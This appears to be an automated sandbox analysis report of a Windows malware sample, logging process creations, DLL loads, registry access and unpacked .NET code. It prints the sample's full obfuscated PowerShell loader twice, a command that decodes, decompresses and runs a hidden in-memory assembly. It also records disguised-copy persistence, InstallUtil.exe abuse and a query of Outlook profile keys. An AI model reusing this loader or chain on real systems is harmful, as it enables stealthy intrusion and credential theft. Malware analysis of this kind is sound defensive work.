Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\Desktop\87M9Y3P4Z7.bat' \| Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)\| Out-Null"	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ChannelUris.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo F "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +s +h C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe -WindowStyle hidden -command "$Onnkl = get-content 'C:\Users\user\AppData\Roaming\ChannelUris.bat' \| Select-Object -Last 1; $Mdqytced = [System.Convert]::FromBase64String($Onnkl);$Ktdhxz = New-Object System.IO.MemoryStream( , $Mdqytced );$Mcldrihy = New-Object System.IO.MemoryStream;$Plcywucshy = New-Object System.IO.Compression.GzipStream $Ktdhxz, ([IO.Compression.CompressionMode]::Decompress);$Plcywucshy.CopyTo( $Mcldrihy );$Plcywucshy.Close();$Ktdhxz.Close();[byte[]] $Mdqytced = $Mcldrihy.ToArray();[Array]::Reverse($Mdqytced); $Mxpzv = [System.AppDomain]::CurrentDomain.Load($Mdqytced); $Ylvhvbxsq = $Mxpzv.EntryPoint; $Ylvhvbxsq.DeclaringType.InvokeMember($Ylvhvbxsq.Name, [System.Reflection.BindingFlags]::InvokeMethod, $null, $null, $null)\| Out-Null"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: ifsutil.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: atl.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: ifsutil.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\xcopy.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\attrib.exe	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: atl.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ChannelUris.bat.Zhe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasapi32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasman.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rtutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: vaultcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: msasn1.dll

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\87M9Y3P4Z7.bat.Zhe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: 87M9Y3P4Z7.bat

Static file information: File size 1410688 > 1048576

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006797000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.00000000066F5000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000004FC9000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289959595.0000000008940000.00000004.08000000.00040000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D7A000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.00000000056C4000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006E1D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006797000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.00000000066F5000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2262903919.0000000004FC9000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289959595.0000000008940000.00000004.08000000.00040000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D7A000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2415826466.00000000056C4000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006E1D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: powershell.pdbUGP source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000000.2230623116.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, ChannelUris.bat.Zhe, 00000013.00000000.2381194622.0000000000248000.00000020.00000001.01000000.00000009.sdmp, ChannelUris.bat.Zhe.17.dr, 87M9Y3P4Z7.bat.Zhe.5.dr
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2289612255.00000000088F0000.00000004.08000000.00040000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006687000.00000004.00000800.00020000.00000000.sdmp, 87M9Y3P4Z7.bat.Zhe, 00000007.00000002.2269230872.0000000006052000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006CBD000.00000004.00000800.00020000.00000000.sdmp, ChannelUris.bat.Zhe, 00000013.00000002.2444515974.0000000006D0D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: powershell.pdb source: 87M9Y3P4Z7.bat.Zhe, 00000007.00000000.2230623116.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, ChannelUris.bat.Zhe, 00000013.00000000.2381194622.0000000000248000.00000020.00000001.01000000.00000009.sdmp, ChannelUris.bat.Zhe.17.dr, 87M9Y3P4Z7.bat.Zhe.5.dr

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 7.2.87M9Y3P4Z7.bat.Zhe.6256430.2.raw.unpack, FOOWUJHFfF8folaxFXM.cs	.Net Code: Type.GetTypeFromHandle(oBaXCmDfWWcAesiu78d.TwjRpFSZyR(16777347)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(oBaXCmDfWWcAesiu78d.TwjRpFSZyR(16777252)),Type.GetTypeFromHandle(oBaXCmDfWWcAesiu78d.TwjRpFSZyR(16777284))})
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6348058.5.raw.unpack, FOOWUJHFfF8folaxFXM.cs	.Net Code: Type.GetTypeFromHandle(oBaXCmDfWWcAesiu78d.TwjRpFSZyR(16777347)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(oBaXCmDfWWcAesiu78d.TwjRpFSZyR(16777252)),Type.GetTypeFromHandle(oBaXCmDfWWcAesiu78d.TwjRpFSZyR(16777284))})

.NET source code contains potential unpacker

Source: 7.2.87M9Y3P4Z7.bat.Zhe.6687238.8.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6687238.8.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6687238.8.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6687238.8.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 7.2.87M9Y3P4Z7.bat.Zhe.6687238.8.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
